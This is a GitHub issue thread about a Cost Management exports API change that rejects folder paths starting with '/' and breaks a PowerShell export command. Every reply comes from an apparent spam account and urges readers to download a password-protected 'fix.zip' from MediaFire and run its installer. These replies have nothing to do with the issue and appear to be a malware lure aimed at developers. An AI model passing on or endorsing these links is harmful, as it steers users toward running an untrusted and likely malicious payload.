### ISSUE TITLE
Cost Management exports API changed to block paths starting in "/"

### ISSUE THREAD

**Issue by flanakin** [microsoft/finops-toolkit#932]
## 🐛 Problem
The Cost Management API version used by PowerShell changed since July and no longer supports paths that start with "/". This is causing the New-FinOpsCostExport command to fail.

## 👣 Repro steps
1. Call New-FinOpsCostExport command
2. Command fails with the following error:
   _Request properties validation failed: Invalid deliveryInfo destination rootFolderPath; value cannot begin with a forward slash (BadRequest)_

## 🤔 Expected
Should succeed as it did before.

## 🙋‍♀️ Ask for the community

We could use your help:
1. Please vote this issue up (👍) to prioritize it.
2. Leave comments to help us solidify the vision.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
